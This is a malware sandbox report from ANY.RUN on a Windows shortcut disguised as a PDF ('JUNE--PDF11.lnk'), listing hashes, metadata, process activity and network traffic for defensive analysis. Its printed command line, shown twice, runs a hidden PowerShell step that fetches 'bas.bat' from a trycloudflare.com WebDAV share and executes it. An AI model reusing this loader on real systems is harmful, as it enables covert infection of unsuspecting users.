File name:

JUNE--PDF11.lnk

Full analysis: https://app.any.run/tasks/e0ff07d8-6040-4686-b62b-15d3d4d06953
Verdict: Malicious activity
Analysis date: February 02, 2025, 17:06:21
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
webdav
Indicators:
MIME: application/x-ms-shortcut
File info: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=1, Unicoded, MachineID vmi1845735, EnableTargetMetadata KnownFolderID 1AC14E77-02E7-4E5D-B744-2EB1AE5198B7, Archive, ctime=Sat May 8 08:16:08 2021, atime=Sat May 8 08:16:08 2021, mtime=Sat May 8 08:16:08 2021, length=450560, window=showminnoactive, IDListSize 0x020d, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\", LocalBasePath "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MD5:

A9D993EDF6BCF8F6B3D8B81F8ADEF0DA

SHA1:

AE5C80C3497C52892072B7F801CC88AE82E1FCCD

SHA256:

710C0A4F0A1956B1233A6A185FC4ED99E0CBABEE2BA7F71EDB6AE7C8211E6AA0

SSDEEP:

24:8Ff4NZsx2XMLD6cr2YKqDNjTWxOfdJBWkp+/CWt6SWl1qhSCFUMkW6SChXZO4I0s:8Ffo83pftax2dJQW0HkIzQIGKxfGYE5

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 3608)

  • SUSPICIOUS

    • Manipulates environment variables

      • powershell.exe (PID: 3608)

    • Starts process via Powershell

      • powershell.exe (PID: 3608)

    • Remote file execution via WebDAV

      • powershell.exe (PID: 3608)

  • INFO

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 3608)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: IDList, LinkInfo, RelativePath, WorkingDir, CommandArgs, IconFile, Unicode, TargetMetadata
FileAttributes: Archive
CreateDate: 2021:05:08 08:16:08+00:00
AccessDate: 2021:05:08 08:16:08+00:00
ModifyDate: 2021:05:08 08:16:08+00:00
TargetFileSize: 450560
IconIndex: 1
RunWindow: Show Minimized No Activate
HotKey: (none)
TargetFileDOSName: powershell.exe
DriveType: Fixed Disk
DriveSerialNumber: 5AC5-99CB
VolumeLabel: Windows
LocalBasePath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
RelativePath: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WorkingDirectory: C:\Users\Administrator\Desktop
CommandLineArguments: -w hidden -c "Copy-Item '\\bush-felt-fossil-richard.trycloudflare.com@SSL\DavWWWRoot\bas.bat' \"$env:USERPROFILE\Downloads\"; Start-Process \"$env:USERPROFILE\Downloads\bas.bat\" -WindowStyle Hidden"
IconFileName: %SystemRoot%\System32\SHELL32.dll
MachineID: vmi1845735
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
128
Monitored processes
2
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start powershell.exe no specs conhost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1704\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3608"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c "Copy-Item '\\bush-felt-fossil-richard.trycloudflare.com@SSL\DavWWWRoot\bas.bat' \"$env:USERPROFILE\Downloads\"; Start-Process \"$env:USERPROFILE\Downloads\bas.bat\" -WindowStyle Hidden"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
4 308
Read events
4 308
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
3
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
3608powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_4knhl24y.fps.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3608powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\bde68f2d475f5c47.customDestinations-msbinary
MD5:58F93A2A1AC5FC79F3DE64B4315AF144
SHA256:DF6954A4C55F00E61D2AFEFF3D2C107636F6065886972E505194F7100DCB1247
3608powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_20td2b0e.jl2.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3608powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8XZCTGLJ5ZHMHUV76R0D.tempbinary
MD5:58F93A2A1AC5FC79F3DE64B4315AF144
SHA256:DF6954A4C55F00E61D2AFEFF3D2C107636F6065886972E505194F7100DCB1247
3608powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:651FFB84F65ABB77E9CAE4B63D43FA8B
SHA256:AC06BEF0D86D575B49DABE339D7500CFFE8955EA10CE9E8959EE95A01AA114C6
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
26
DNS requests
14
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5064
SearchApp.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
1176
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
6684
backgroundTaskHost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
7024
SIHClient.exe
GET
200
23.59.18.102:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
7024
SIHClient.exe
GET
200
23.59.18.102:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
51.104.136.2:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
5064
SearchApp.exe
2.16.204.145:443
www.bing.com
Akamai International B.V.
DE
whitelisted
5064
SearchApp.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
3584
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1176
svchost.exe
20.190.159.2:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1176
svchost.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
1076
svchost.exe
23.218.210.69:443
go.microsoft.com
AKAMAI-AS
DE
whitelisted
4
System
192.168.100.255:137
whitelisted
7024
SIHClient.exe
20.109.210.53:443
slscr.update.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted

DNS requests

Domain
IP
Reputation
www.bing.com
  • 2.16.204.145
  • 2.16.204.138
  • 2.16.204.152
  • 2.16.204.149
  • 2.16.204.135
  • 2.16.204.161
  • 2.16.204.160
  • 2.16.204.148
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
settings-win.data.microsoft.com
  • 4.231.128.59
whitelisted
login.live.com
  • 20.190.159.2
  • 20.190.159.4
  • 20.190.159.68
  • 40.126.31.73
  • 40.126.31.67
  • 40.126.31.129
  • 20.190.159.71
  • 40.126.31.128
whitelisted
go.microsoft.com
  • 23.218.210.69
whitelisted
slscr.update.microsoft.com
  • 20.109.210.53
whitelisted
www.microsoft.com
  • 23.59.18.102
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 52.165.164.15
whitelisted
arc.msn.com
  • 20.223.36.55
whitelisted
fd.api.iris.microsoft.com
  • 20.223.36.55
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
JUNE--PDF11.lnk